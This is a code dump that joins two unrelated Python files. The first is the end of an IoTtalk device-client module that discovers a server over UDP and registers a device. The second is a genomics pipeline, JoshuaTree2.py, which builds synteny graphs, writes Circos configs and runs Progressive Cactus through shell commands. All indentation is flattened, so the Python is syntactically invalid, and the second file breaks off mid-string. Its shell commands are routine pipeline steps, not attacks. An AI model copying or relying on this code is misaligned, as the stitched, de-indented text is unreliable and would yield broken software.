UDP_IP = ''
UDP_PORT = 17000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((UDP_IP, UDP_PORT))
while EASYCONNECT_HOST==None:
print ('Searching for the IoTtalk server...')
data, addr = s.recvfrom(1024)
if str(data.decode()) == 'easyconnect':
EASYCONNECT_HOST = 'http://{}:9999'.format(addr[0])
csmapi.ENDPOINT=EASYCONNECT_HOST
#print('IoTtalk server = {}'.format(csmapi.ENDPOINT))
timestamp={}
MAC=get_mac_addr()
thx=None
def register_device(addr):
global MAC, profile, timestamp, thx
if csmapi.ENDPOINT == None: detect_local_ec()
if addr != None: MAC = addr
for i in profile['df_list']: timestamp[i] = ''
print('IoTtalk Server = {}'.format(csmapi.ENDPOINT))
profile['d_name'] = csmapi.register(MAC,profile)
print ('This device has successfully registered.')
print ('Device name = ' + profile['d_name'])
if thx == None:
print ('Create control threading')
thx=threading.Thread(target=ControlChannel) #for control channel
thx.daemon = True #for control channel
thx.start() #for control channel
def device_registration_with_retry(URL=None, addr=None):
if URL != None:
csmapi.ENDPOINT = URL
success = False
while not success:
try:
register_device(addr)
success = True
except Exception as e:
print ('Attach failed: '),
print (e)
time.sleep(1)
def pull(FEATURE_NAME):
global timestamp
if state == 'RESUME': data = csmapi.pull(MAC,FEATURE_NAME)
else: data = []
if data != []:
if timestamp[FEATURE_NAME] == data[0][0]:
return None
timestamp[FEATURE_NAME] = data[0][0]
if data[0][1] != []:
return data[0][1]
else: return None
else:
return None
def push(FEATURE_NAME, *data):
if state == 'RESUME':
return csmapi.push(MAC, FEATURE_NAME, list(data))
else: return None
def get_alias(FEATURE_NAME):
try:
alias = csmapi.get_alias(MAC,FEATURE_NAME)
except Exception as e:
#print (e)
return None
else:
return alias
def set_alias(FEATURE_NAME, alias):
try:
alias = csmapi.set_alias(MAC, FEATURE_NAME, alias)
except Exception as e:
#print (e)
return None
else:
return alias
def deregister():
return csmapi.deregister(MAC)
|
JoshuaTree2.py | #################
#### IMPORTS ####
import click, os, pandas as pd, numpy as np, subprocess, sys, shutil
from pybedtools import BedTool
from pyfaidx import Fasta
from itertools import combinations
import scipy.sparse as sps
import glob, re
from random import randint
from Bio import SeqIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceTreeConstructor, _DistanceMatrix
#import multiprocessing as mp
from time import sleep
from pathos import multiprocessing as mp
from pathos.pp_map import ppmap
from Bio import AlignIO
from ete3 import PhyloTree, Tree,TreeStyle,NodeStyle,EvolTree
import networkx as nx
import matplotlib.pyplot as plt
import pickle
#################
#### CLASSES ####
#########################
#### SYNTENY CLASSES ####
class SuperSynteny:
def __init__(self, pairwise_syntenies, max_distance, q_genome = ''):
self.pairwise_syntenies = {synteny.synteny_file: synteny for synteny in pairwise_syntenies}
self.max_distance = max_distance
self.q_genome = q_genome
def generate_global_synteny_graph(self, fasta_out_dir, memory=150):
synteny_graph = nx.Graph()
for synteny in self.pairwise_syntenies.values():
synteny_graph.add_edges_from(zip(synteny.q_genome.protID+'.'+synteny.synteny_structure['q_chr']+'\t'+synteny.synteny_structure['q_xi']+'\t'+synteny.synteny_structure['q_xf'],
synteny.s_genome.protID+'.'+synteny.synteny_structure['s_chr']+'\t'+synteny.synteny_structure['s_xi']+'\t'+synteny.synteny_structure['s_xf']))
genomes = {genome.protID: genome for genome in set(reduce(lambda x,y: x+y,[[synteny.q_genome, synteny.s_genome] for synteny in self.pairwise_syntenies.values()]))}
nodes_all = np.array(synteny_graph.nodes())
if self.q_genome:
nodes = np.array(filter(lambda x: x.startswith(self.q_genome.protID), nodes_all))
else:
nodes = nodes_all
clustered_regions = BedTool('\n'.join(nodes),from_string=True).sort().cluster(d=self.max_distance).to_dataframe().astype(str)
nodes = nodes_all
clustered_regions = clustered_regions.rename(dict(enumerate(clustered_regions['chrom']+'\t'+clustered_regions['start']+'\t'+clustered_regions['end'])))
for cluster in clustered_regions['name'].unique():
synteny_graph.add_edges_from(list(combinations(list(clustered_regions[clustered_regions['name'] == cluster].index),r=2)))
synteny_graph.add_edges_from(zip(nodes,nodes))
connected_components = enumerate(list(nx.connected_components(synteny_graph)))
#species_colors = {species:i for i,species in enumerate(genomes.keys())}
#node_labels = {}
#for i, regions in connected_components:
# for region in regions:
# node_labels[region] = species_colors[region.split('.')[0]]#i
#plt.figure()
#nx.draw_spectral(synteny_graph,node_color=np.vectorize(lambda x: node_labels[x])(nodes),arrows=False,node_size=10)
#plt.savefig('./'+'spectral_layout.png',dpi=300)
for i, regions in connected_components:#list(nx.connected_component_subgraphs(synteny_graph)):
regions = BedTool('\n'.join(regions),from_string=True).sort().merge(d=self.max_distance).to_dataframe().astype(dict(chrom=str,start=int,end=int))
regions['species'] = regions['chrom'].map(lambda x: x.split('.')[0])
regions['chrom'] = regions['chrom'].map(lambda x: x.split('.',1)[1])
print(regions)
with open(fasta_out_dir+'fasta_output.fa','w') as f:
for species in regions['species'].unique():
f.write('\n'.join(['>%s.%s_%d_%d\n%s'%(species, chrom, start, end, str(genomes[species].fasta[chrom][start:end])) for chrom, start, end, species in map(tuple,regions[regions['species'] == species].values)]) + '\n')
subprocess.call('reformat.sh overwrite=true in=%s out=%s fastawrap=60 Xmx=%dG && rm %s'%(fasta_out_dir+'fasta_output.fa',fasta_out_dir+'FastaOut%d.fasta'%i,memory,fasta_out_dir+'fasta_output.fa') , shell=True)
#global_synteny_matrix = nx.to_scipy_sparse_matrix(synteny_graph,nodelist=nodes)
#n_components, connected_components = sps.csgraph.connected_components(global_synteny_matrix,directed=False)
#for connected_component in connected_components:
# regions = np.
self.synteny_graph = synteny_graph
self.genomes = genomes
def visualize_synteny_graph(self, work_dir = './'):
work_dir += '/'
nodes = np.array(self.synteny_graph.nodes())
connected_components = enumerate(list(nx.connected_components(self.synteny_graph)))
species_colors = {species:i for i,species in enumerate(self.genomes.keys())}
node_labels_species = {}
node_labels_component = {}
for i, regions in connected_components:
for region in regions:
node_labels_species[region] = species_colors[region.split('.')[0]]#i
node_labels_component[region] = i
plt.figure()
nx.draw_spectral(self.synteny_graph,node_color=np.vectorize(lambda x: node_labels_species[x])(nodes),arrows=False,node_size=10)
plt.savefig(work_dir+'spectral_layout_species.png',dpi=300)
plt.figure()
nx.draw_spectral(self.synteny_graph,node_color=np.vectorize(lambda x: node_labels_component[x])(nodes),arrows=False,node_size=10)
plt.savefig(work_dir+'spectral_layout_component.png',dpi=300)
def generate_global_synteny_graph_reference(self, fasta_out_dir): # fixme add global synteny graph with no references... all sequences if syntenic Aij = 1, if within merge distance Aij = 1, just merge and output all connected components, probably easier and more straight forward, add global option for this, maybe separate method and circos_dropper like synteny computations, networkx plot final nodes
global_synteny_indices = []
for synteny in self.pairwise_syntenies.values():
synteny.synteny_structure['name'] = np.array(synteny.synteny_structure.index)#synteny.synteny_structure['q_chr'] + '\t' + synteny.synteny_structure['q_xi'] + '\t' + synteny.synteny_structure['q_xf']#[['q_chr','q_xi','q_xf']]
global_synteny_indices.extend([(synteny.synteny_file,name) for name in synteny.synteny_structure['name'].as_matrix().tolist()])
global_synteny_indices = pd.MultiIndex.from_tuples(global_synteny_indices,names=['synteny_file','region'])
global_synteny_matrix = pd.DataFrame(np.zeros((len(global_synteny_indices),)*2),index=global_synteny_indices,columns=global_synteny_indices)
global_synteny_matrix = global_synteny_matrix.sort_index(axis=0).sort_index(axis=1)
referenced_regions = list(global_synteny_matrix.index)
clustered_regions = BedTool(np.array(referenced_regions)[:,1].tolist()).sort().cluster(d=self.max_distance).to_dataframe().astype(str)
#print(clustered_regions)
clustered_regions = clustered_regions.rename(dict(enumerate(clustered_regions['chrom']+'\t'+clustered_regions['start']+'\t'+clustered_regions['end'])))
for cluster in clustered_regions['name'].unique():
list_regions = list(clustered_regions[clustered_regions['name'] == cluster].index)
for region_i,region_j in list(combinations(list_regions,r=2)):
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_j]] = 1
global_synteny_matrix.loc[pd.IndexSlice[:,region_j],pd.IndexSlice[:,region_i]] = 1
for region_i in list_regions:
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_i]] = 1 # fixme add global mode
"""
regions_bed_files = dict(zip(regions,map(lambda x: BedTool(x,from_string=True),regions)))
for region_i,region_j in list(combinations(regions,r=2)) + zip(regions,regions):
if region_i == region_j:
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_i]] = 1
else:
distance = int(str(regions_bed_files[region_i].closest(regions_bed_files[region_j],d=True)).split('\t')[-1])
if distance >=0 and distance <= self.max_distance:
global_synteny_matrix.loc[pd.IndexSlice[:,region_i],pd.IndexSlice[:,region_j]] = 1
global_synteny_matrix.loc[pd.IndexSlice[:,region_j],pd.IndexSlice[:,region_i]] = 1"""
n_components, connected_components = sps.csgraph.connected_components(global_synteny_matrix.as_matrix())
referenced_regions = np.array(referenced_regions)
for i,connected_component_list in enumerate(connected_components):
out_fasta = []
q_regions = BedTool('\n'.join(np.vectorize(lambda region: region + '%s.%s'%(self.q_genome.protID,'_'.join(region)))(str(BedTool(map(lambda x: x.split(),referenced_regions[connected_component_list,1].tolist())).sort().merge(d=100000000000)).splitlines())),from_string=True).sequence(fi=self.q_genome.fasta,name=True)#np.vectorize(lambda region: region + '%s %s'%(self.q_genome.protID,' '.join(region)))(referenced_regions[connected_component_list]).tolist()
out_fasta.append(q_regions)
referenced_regions_s_species = referenced_regions[connected_component_list,:]
for species in set(referenced_regions_s_species[:,0]):
s_regions = BedTool('\n'.join(np.vectorize(lambda region: region + '%s.%s'%(self.pairwise_syntenies[species].s_genome.protID,'_'.join(region)))(str(BedTool(map(lambda x: x.split(),np.vectorize(lambda x: '\t'.join(self.pairwise_syntenies[species].synteny_structure.loc[x,['s_chr','s_xi','s_xf']].as_matrix().tolist()))(referenced_regions_s_species[referenced_regions_s_species[:,0]==species,1]).tolist())).sort().merge(d=self.max_distance)).splitlines())),from_string=True).sequence(fi=self.pairwise_syntenies[species].s_genome.fasta,name=True)
out_fasta.append(s_regions)
with open(fasta_out_dir+'/'+'FastaOut%d.fa'%i,'w') as f:
f.write(reduce(lambda x,y: x+'\n'+y,out_fasta))
def test(self,region1, region2):
syntenic_sequences = ['future_testing_in_development_global_mode']
region1 = region1.split()
region2 = region2.split()
return 1 if region1 == region2 or (region1[0] == region2[0] and (int(region1[2]) + self.max_distance >= int(region2[1]) or int(region2[2]) + self.max_distance >= int(region1[1]))) or (region1,region2) in syntenic_sequences else 0
class PairwiseSynteny:
def __init__(self, q_genome, s_genome, synteny_file='', loci_threshold = 4):
self.synteny_file = synteny_file
self.q_genome = q_genome
self.s_genome = s_genome
self.loci_threshold = loci_threshold
self.chrom_colors = {}
def generate_synteny_structure(self,synteny_path):
"""Take anchor file or synteny file and searches for starting and ending genes for each syntenic block"""
if self.synteny_file.endswith('.unout'):
self.unout2structure(self.q_genome, self.s_genome)
elif self.synteny_file.endswith('.lifted.anchors'):
self.anchor2structure(self.q_genome, self.s_genome)
elif self.synteny_file.endswith('.bed'):
self.import_synteny_structure()
else:
self.run_synteny(self.q_genome,self.s_genome,synteny_path)
self.anchor2structure(self.q_genome, self.s_genome)
self.synteny_structure_index()
def synteny_structure_index(self):
self.synteny_structure = self.synteny_structure.rename(dict(zip(range(self.synteny_structure.shape[0]),self.synteny_structure['q_chr']+'\t'+self.synteny_structure['q_xi']+'\t'+self.synteny_structure['q_xf'])))
def import_synteny_structure(self):
self.synteny_structure = pd.read_table(self.synteny_file,header=None,names=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf'])
self.synteny_structure_index()
#self.synteny_structure = self.synteny_structure.rename(dict(enumerate((self.synteny_structure['q_chr']+'\t'+self.synteny_structure['q_xi']+'\t'+self.synteny_structure['q_xf']).as_matrix().tolist())))
def unout2structure(self,q_genome,s_genome):
with open(self.synteny_file,'r') as f:
lines = np.array(f.read().splitlines())
anchors = np.array_split(lines,np.where(np.vectorize(lambda line: line.startswith('\t') == 0)(lines))[0])
synteny_structure = []
for anchor in anchors:
anchor = np.array(map(lambda line: line.split('\t')[1].split(','),anchor[1:].tolist()))
if len(anchor) >= self.loci_threshold and anchor.tolist():
q_genes, s_genes = anchor[:,2], anchor[:,5]
q_coords, s_coords = q_genome.df.loc[q_genes,:], s_genome.df.loc[s_genes,:]
synteny_structure.append([q_coords.iloc[0,0],q_coords[['xi','xf']].values.min(),q_coords[['xi','xf']].values.max(),s_coords.iloc[0,0],s_coords[['xi','xf']].values.min(),s_coords[['xi','xf']].values.max()])
self.synteny_structure = pd.DataFrame(synteny_structure,columns=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf']).astype(str)#,index = np.vectorize(lambda x: '\t'.join(map(str,x[:3])))(synteny_structure))
def run_synteny(self,genome1,genome2, synteny_path):
pwd = os.getcwd()
os.chdir(synteny_path)
#subprocess.call('rm {0}/*.bck {0}/*.prj {0}/*.sds {0}/*.ssp {0}/*.suf {0}/*.tis {0}/*.des {0}/*.bed {0}/*.cds'.format(synteny_path),shell=True)
for abs_path, link_name in zip([genome1.bed_file,genome2.bed_file,genome1.CDS_file,genome2.CDS_file],[genome1.protID+'.bed',genome2.protID+'.bed',genome1.protID+'.cds',genome2.protID+'.cds']):
subprocess.call('ln -s %s %s'%(abs_path,link_name),shell=True)
try:
subprocess.call('python -m jcvi.compara.catalog ortholog --no_strip_names %s %s'%(genome1.short_name,genome2.short_name),shell=True)
except:
subprocess.call('python -m jcvi.compara.catalog ortholog --no_strip_names %s %s'%(genome1.short_name,genome2.short_name),shell=True)
if genome1.short_name != genome1.protID and genome2.short_name != genome2.protID:
subprocess.call('mv %s.%s.lifted.anchors %s.%s.lifted.anchors'%(genome1.short_name,genome2.short_name,genome1.protID,genome2.protID),shell=True)
self.synteny_file = os.path.abspath('%s.%s.lifted.anchors'%(genome1.protID,genome2.protID))
os.chdir(pwd)
def anchor2structure(self, q_genome, s_genome):
anchor_file = self.synteny_file
with open(anchor_file,'r') as f:
anchors = f.read().split('###')[1:]
synteny_structure = []
for anchor in anchors:
if anchor:
genes = np.array([line.split()[:2] for line in anchor.splitlines() if line])
if genes.shape[0] >= self.loci_threshold:
q_genes, s_genes = genes[:,0] , genes[:,1]
q_coords, s_coords = q_genome.df.loc[q_genes,:], s_genome.df.loc[s_genes,:]
#print q_coords[['xi','xf']]
synteny_structure.append([q_coords.iloc[0,0],q_coords[['xi','xf']].values.min(),q_coords[['xi','xf']].values.max(),s_coords.iloc[0,0],s_coords[['xi','xf']].values.min(),s_coords[['xi','xf']].values.max()])
self.synteny_structure = pd.DataFrame(synteny_structure,columns=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf']).astype(str)
def synteny_structure_2_bed(self,filename):
df = self.synteny_structure
df['q_chr'] = np.vectorize(lambda x: self.q_genome.protID+'-'+x)(df['q_chr'])
df['s_chr'] = np.vectorize(lambda x: self.s_genome.protID+'-'+x)(df['s_chr'])
df.to_csv(filename,sep='\t',index=False,header=None)
def synteny_structure_2_link(self, filename, bundle_links = False, link_gap = 10000):
self.chrom_colors = dict(self.q_genome.chrom_colors,**self.s_genome.chrom_colors)
click.echo(str(self.chrom_colors))
df = self.synteny_structure
df['q_chr'] = np.vectorize(lambda x: self.q_genome.protID+'-'+x)(df['q_chr'])
df['s_chr'] = np.vectorize(lambda x: self.s_genome.protID+'-'+x)(df['s_chr'])
if 0:
df = df[['s_chr','s_xi','s_xf','q_chr','q_xi','q_xf']]
df.to_csv(filename,sep=' ',index=False,header=None)
if bundle_links:
click.echo("./helper_scripts/circos-tools-0.22/tools/bundlelinks/bin/bundlelinks -max_gap {0} -links {1} > {1}.temp && cut -f 1-6 -d " " {1}.temp > {1} && rm {1}.temp".format(str(link_gap), filename))
subprocess.call("./helper_scripts/circos-tools-0.22/tools/bundlelinks/bin/bundlelinks -max_gap {0} -links {1} > {1}.temp && cut -f 1-6 -d \" \" {1}.temp > {1} && rm {1}.temp".format(str(link_gap), filename), shell=True)
if 0:
df = pd.read_table(filename ,sep = ' ', header = None, names = ['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf'])
df['color'] = np.vectorize(lambda x: 'color=%s'%(self.chrom_colors[x]))(df['q_chr'])
print(df)
df.to_csv(filename, sep=' ', index=False, header=None)
self.link = os.path.abspath(filename)
def export_karyotypes(self,circos_input):
self.s_genome.export_karyotype(circos_input+'/'+self.s_genome.protID+'.karyotype.txt')
self.q_genome.export_karyotype(circos_input+'/'+self.q_genome.protID+'.karyotype.txt')
######################
#### GENOME CLASS ####
class Genome:
def __init__(self, fasta_file, bed_file, protID, gff_file = '', gene_info = 'Name'):
self.fasta_file = fasta_file
self.fasta = Fasta(fasta_file)
self.gene_info = gene_info
self.bed_file = bed_file#os.path.abspath(bed_file)
self.short_name = self.bed_file.split('/')[-1].replace('.bed3','').replace('.bed','')
self.protID = protID
self.gff_file = gff_file
self.chrom_colors = {}
if self.gff_file and (os.path.exists(self.bed_file) == 0 or (os.path.exists(self.bed_file) and os.stat(self.bed_file).st_size == 0)):
#click.echo('python -m jcvi.formats.gff bed --type=mRNA --key=%s %s > %s'%(self.gene_info,self.gff_file,self.bed_file))
#print('python -m jcvi.formats.gff bed %s --type=mRNA --key=%s -o %s'%(self.gff_file,self.gene_info,self.bed_file))
subprocess.call('python -m jcvi.formats.gff bed %s --type=mRNA --key=%s -o %s'%(self.gff_file,self.gene_info,self.bed_file),shell=True)#FIXME
"""
with open(gff_file,'r') as f:
for header_line,line in enumerate(f):
if line.startswith('#') == 0:
break
df = pd.read_table(gff_file, skiprows=header_line, header=None,names=['chr','rm_1','feature','xi','xf','rm_3','rm_4','rm_5','Annotation'])
df = df[df['feature'] == 'mRNA'].drop([feat for feat in list(df) if 'rm' in feat],axis=1)
df = df[np.vectorize(lambda line: 'longest=1' in line)(df['Annotation']).astype(bool)]
df['Gene'] = np.vectorize(lambda line: line.split(';')[1].replace('Name=',''))(df['Annotation'])
df['xi'] -= 1
df = df.drop(['feature','Annotation'],axis=1).reindex(columns=['chr','xi','xf','Gene'])
self.df = df
"""
self.bed_file = os.path.abspath(self.bed_file)
self.CDS_file = self.bed_file.replace('.bed3','.cds').replace('.bed','.cds')
self.df = pd.read_table(self.bed_file,header=None,names=['chr','xi','xf','Gene'],dtype={'chr':str,'xi':np.int,'xf':np.int,'Gene':str},usecols=[0,1,2,3])
self.df = self.df.set_index('Gene')
def export_bed(self,filename):
df = self.df.reset_index().rename(dict(index='Gene'),axis='columns').reindex(columns=['chr','xi','xf','Gene'])
df.to_csv(filename,sep='\t',index=False,header=None)
def extract_CDS(self): # python -m jcvi.formats.gff uniq t.PAC2_0.316.gff3 -o uniq.gff3
if os.path.exists(self.CDS_file) == 0 or (os.path.exists(self.CDS_file) and os.stat(self.CDS_file).st_size == 0):
subprocess.call('python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS --id_attribute=%s -o %s'%(self.gff_file,self.fasta_file,self.gene_info,self.CDS_file),shell=True)
def export_karyotype(self, filename, n_chromosomes=25, shorten_chr=False, chrom_file = ''):
df = pd.read_table(self.fasta_file+'.fai', header=None,names=['chr','length'],usecols=[0,1],dtype=dict(zip(['chr','length'],[str,np.int])))
df = df.sort_values(['length'],ascending=False)
chromosomes_names_dict = {}
if chrom_file:
with open(chrom_file) as f:
chromosomes = f.read().splitlines()
if len(chromosomes[0].split()) == 2:
chr_tuples = map(lambda l: tuple(l.split()), chromosomes)
chromosomes_names_dict = dict(chr_tuples)
chromosomes = np.array(chr_tuples)[:,0]
else:
chromosomes = np.array(chromosomes)
#print(df[np.isin(df['chr'].values,chromosomes)].set_index('chr'))
df = df[np.isin(df['chr'].values,chromosomes)].set_index('chr').reindex(chromosomes).reset_index().rename({'index':'chr'})[['chr','length']]
if n_chromosomes < df.shape[0]:
df = df.iloc[:n_chromosomes,:].reset_index(drop=True)
out_txt = []
for i in range(df.shape[0]):
chrom = df.loc[i,'chr']
chr_name = (chromosomes_names_dict[chrom] if chromosomes_names_dict else chrom) if not shorten_chr else chrom[0] + chrom.split('_')[-1]
if i >= 25:
color = '%d,%d,%d'%(randint(1,255),randint(1,255),randint(1,255))
else:
color = 'chr%d'%(i+1)
out_txt.append('chr - %s-%s %s 0 %d %s\n'%(self.protID,chrom,chr_name,df.loc[i,'length'],color))
self.chrom_colors['%s-%s'%(self.protID,chrom)] = color
with open(filename,'w') as f:
f.writelines(out_txt)
self.karyotype = os.path.abspath(filename)
######################
#### CIRCOS CLASS ####
class Circos:
def __init__(self,PairwiseSynteny):
self.synteny = PairwiseSynteny
def write_ideogram_config(self, filename='txideogram.conf'):
with open(filename,'w') as f:
f.write("""<ideogram>
show = yes
<spacing>
default = 0.005r
</spacing>
radius = 0.9r
thickness = 40p
fill = yes
show_label = yes
label_font = default
label_radius = 1.08r
label_size = 40
label_parallel = yes
show_bands = yes
fill_bands = yes
</ideogram>""")
self.ideogram = filename
return filename
def write_ticks_config(self, filename='txticks.conf'):
with open(filename,'w') as f:
f.write("""show_ticks = yes
show_tick_labels = yes
<ticks>
radius = 1.01r
color = black
thickness = 2p
multiplier = 1e-6
format = %d
<tick>
spacing = 1u
size = 5p
</tick>
<tick>
spacing = 5u
size = 10p
show_label = yes
label_size = 20p
label_offset = 10p
format = %d
</tick>
</ticks>""")
self.ticks = filename
return filename
def generate_config(self, ticks = 'txticks.conf', ideogram = 'txideogram.conf', links_and_rules = 'linksAndrules.conf', config='circos.conf', variable_thickness = False, thickness_factor=1000, switch_lines = False):
colors = pd.read_table(self.synteny.s_genome.karyotype if not switch_lines else self.synteny.q_genome.karyotype,header=None,usecols=[2,6],sep=' ').as_matrix()
self.links_and_rules = links_and_rules
self.config = config
self.ideogram,self.ticks = ideogram, ticks
if hasattr(self, 'ticks'):
self.write_ticks_config(self.ticks)
if hasattr(self, 'ideogram'):
self.write_ideogram_config(self.ideogram)
with open(self.config,'w') as f:
f.write("""# circos.conf
karyotype = %s, %s
chromosomes_units = 1000000
chromosomes_display_default = yes
<<include %s>>
<<include %s>>
<<include %s>>

<<include etc/colors_fonts_patterns.conf>>
<<include etc/housekeeping.conf>>
"""%(self.synteny.q_genome.karyotype , self.synteny.s_genome.karyotype, self.ideogram,self.ticks,self.links_and_rules))
with open(self.links_and_rules,'w') as f:
f.write("""
<links>
<link>
file = %s
radius = 0.99r
bezier_radius = 0r
%s
ribbon = yes
color = black
<rules>
<rule>
condition = var(intrachr)
show = no
</rule>\n"""%(self.synteny.link, 'thickness = eval(max(1,round(var(size1)/%d)))'%thickness_factor if variable_thickness else '') + '\n'.join(['<rule>\ncondition = %s(%s)\ncolor = %s\n</rule>'%('from' if switch_lines else 'to',chrom,color) for chrom,color in (self.synteny.q_genome.chrom_colors.items() if switch_lines else self.synteny.s_genome.chrom_colors.items())]) + '\n</rules>\n</link>\n</links>') # map(tuple,colors)
def run_circos(self, output_dir='./', pdf=False):
subprocess.call('circos -conf %s -outputfile %s-%s -outputdir %s'%(self.config,self.synteny.q_genome.protID,self.synteny.s_genome.protID,output_dir),shell=True)
if pdf:
subprocess.call('convert %s/%s-%s.png %s/%s-%s.pdf'%(os.path.abspath(output_dir),self.synteny.q_genome.protID,self.synteny.s_genome.protID,os.path.abspath(output_dir),self.synteny.q_genome.protID,self.synteny.s_genome.protID),shell=True)
##########################
#### CACTUS RUN CLASS ####
class CactusRun:
def __init__(self,fasta_output_path,cactus_run_directory,cactus_softlink, nickname_file = '', fasta_path = ''):
self.fasta_output_path = fasta_output_path +'/'
self.cactus_run_directory = cactus_run_directory +'/'
self.cactus_output = self.cactus_run_directory+'output/'
self.hal_path = self.cactus_output+'hal/'
self.cactus_softlink = os.path.abspath(cactus_softlink+'/bin/runProgressiveCactus.sh')
if not nickname_file:
self.nickname_file = self.cactus_run_directory + 'prot_dict'
self.protIDs = [fasta.split('_')[-2] for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')]
with open(self.nickname_file,'w') as f:
f.write('\n'.join(['\t'.join((protID,)*2) for protID in self.protIDs]))
else:
self.nickname_file = nickname_file
self.cactus_env_softlink = os.path.abspath(cactus_softlink+'/environment')
#subprocess.call('source %s'%cactus_env_softlink,shell=True)
def fasta2seq(self, fasta):
self.nickname2file_dict = {}
self.fasta_run_dir = self.cactus_output+fasta[fasta.rfind('/')+1:].split('.')[0]+'/'
try:
os.mkdir(self.fasta_run_dir)
except:
pass
subprocess.call('rm %s/*.fa %s/*.fasta -r'%(self.fasta_run_dir,self.fasta_run_dir),shell=True)
with open(fasta) as f1:
records = SeqIO.parse(f1,'fasta')
for record in records:
protID = record.id.split('.')[0]
nickname = self.nicknames[protID]
record.id = record.id.replace(protID,nickname)
record.description = record.id
SeqIO.write(record, open(self.fasta_run_dir+nickname+'.fa','a'),'fasta')
self.nickname2file_dict[nickname] = os.path.abspath(self.fasta_run_dir+nickname+'.fa')
self.generate_trees()
self.seqfile = self.fasta_run_dir+'seqfile'
with open(self.fasta_run_dir+'output_tree.nh','r') as f1, open(self.seqfile,'w') as f2:
f2.write(f1.read()+'\n'+'\n'.join(['%s %s'%(nickname, nickname_file) for nickname, nickname_file in self.nickname2file_dict.items()]))
run_file = os.path.abspath(self.seqfile+'.sh')
self.run_files.append(run_file)
with open(run_file,'w') as f:
f.write('#!/bin/bash\nexport _JAVA_OPTIONS="-Xmx155g"\n%s --maxThreads 16 %s %s %s >& %s\nscp %s %s'%(os.path.abspath(self.cactus_softlink),self.seqfile,self.fasta_run_dir,fasta.replace('.fasta','.hal'),self.seqfile+'.sh.stdout',fasta.replace('.fasta','.hal'),self.hal_path+fasta.split('/')[-1].replace('.fasta','.hal')))
return run_file
def write_fastas_seqfile(self):
with open(self.nickname_file,'r') as f:
self.nicknames = dict([tuple(line.split()) for line in f.read().splitlines() if line])
fastas = glob.glob(self.fasta_output_path+'/FastaOut*.fa')+glob.glob(self.fasta_output_path+'/FastaOut*.fasta')
self.run_files = []
fasta2seq = lambda fasta: self.fasta2seq(fasta)
p = mp.ProcessingPool()
r = p.amap(fasta2seq,fastas)
r.wait()
self.run_files = r.get()
p.close()
def run_cactus(self, submission = 'local', shifter = False):
with open('nextflow.config','w') as f:
f.write('\n'.join(["process.%s = '%s'"%(i,j) for i,j in zip(['executor','memory', 'clusterOptions'],[submission,'155G', '' if submission != 'sge' else '-P plant-analysis.p -cwd -l h_rt=24:00:00 -pe pe_slots 16 -e OutputFile.txt'])]+(["shifter.enabled = true"] if shifter else ["docker.enabled = true"])+["process.container = 'lepbase/progressive-cactus:latest'"]))
subprocess.call("export SHIFTER_RUNTIME='' && nextflow cactus_run.nf --work_dir %s --cactus_run_files %s --environment %s"%(os.getcwd(),','.join(os.path.abspath(run_file) for run_file in self.run_files),os.path.abspath(self.cactus_env_softlink)),shell=True)
#for run_file in self.run_files:
# subprocess.call('nohup sh %s &'%(run_file),shell=True)
# fixme, make sure to activate progressive cactus environment; sourcec environment in cactus folder, add hal2maf, send maf 2 cns analysis, parallelize and pipeline all scripts, maybe call nextflow from within python for each of the jobs for pipeline submission
def generate_trees(self,scaled = 10000, kmer_length = 23, multi_fasta = False):
# fixme use mafft to generate new guide trees for each set of input fasta files
subprocess.call('sourmash compute -f --scaled %d %s/*.fa -o %s.sig -k %d %s'%(scaled,self.fasta_run_dir,self.fasta_run_dir+'tree',kmer_length,'--singleton' if multi_fasta else ''),shell=True)
subprocess.call('sourmash compare %s.sig --csv %s.cmp.csv'%(self.fasta_run_dir+'tree',self.fasta_run_dir+'tree'),shell=True)
df = pd.read_csv('%s.cmp.csv'%(self.fasta_run_dir+'tree'),index_col = None)
samples = [fasta.split('/')[-1].replace('.fa','') for fasta in list(df)]
distance_matrix = df.as_matrix()
constructor = DistanceTreeConstructor()
dm = _DistanceMatrix(names=samples,matrix=[list(distance_matrix[i,0:i+1]) for i in range(len(samples))])
tree = constructor.nj(dm)
Phylo.write(tree,self.fasta_run_dir+'output_tree.nh','newick') # fixme bug, tree being generated has negative branch lengths, this is why cactus is failing
def hal2maf(self, n_cpus, hal2maf_softlink):
self.hal2maf_softlink = hal2maf_softlink
self.maf_path = self.hal_path.replace('hal','maf')
run_hal = lambda hal: self.run_hal2maf(hal)
p = mp.ProcessingPool()
r = p.amap(run_hal, glob.glob(self.hal_path+'/*.hal'))
r.wait()
p.close()
"""
for hal in glob.glob(self.hal_path+'/*.hal'):
proc = mp.Process(target=run_hal, args=(hal,))
proc.daemon = True
proc.start()
while len(mp.active_childern()) > n_cpus:
sleep(1)
while len(mp.active_childern()) > 0:
sleep(1)"""
def run_hal2maf(self,hal):
os.system('%s %s %s'%(self.hal2maf_softlink, hal, hal.replace('hal','maf')))
###################
#### MAF CLASS #### fixme try to inheret from circos class, maf class will allow you to extract CNS or VCF, visualize CS and CNS
class MAF_filter_config:
def __init__(self, config_file='maf_filter_config.bpp', input_file='merged.maf',species = 'list_species.txt', reference_species = '', log_file = 'log.out', out_all_species = True):
self.config_file = config_file
self.config_txt = ''
self.input_file = input_file
self.input_format = 'Maf'
self.log_file = log_file
self.all_species = species.split(',') if not species.endswith('.txt') else open(species,'r').read().splitlines()
all_species_but_one = set(self.all_species) - {reference_species}
if out_all_species:
self.species = self.all_species
else:
self.species = all_species_but_one
self.reference_species = reference_species
self.endtxt = []
def export(self):
with open(self.config_file,'w') as f:
f.write(self.config_txt)
def add_subset_text(self, species = '', keep=True):
self.endtxt.append("""Subset(\\
strict=yes,\\
keep=%s,\\
species=(%s),\\
remove_duplicates=yes),\\"""%('yes' if keep else 'no', species if species else ','.join(self.all_species)))
def add_vcf_text(self, vcf_file='vcfs/merged.vcf'):
self.endtxt.append("""VcfOutput(\\
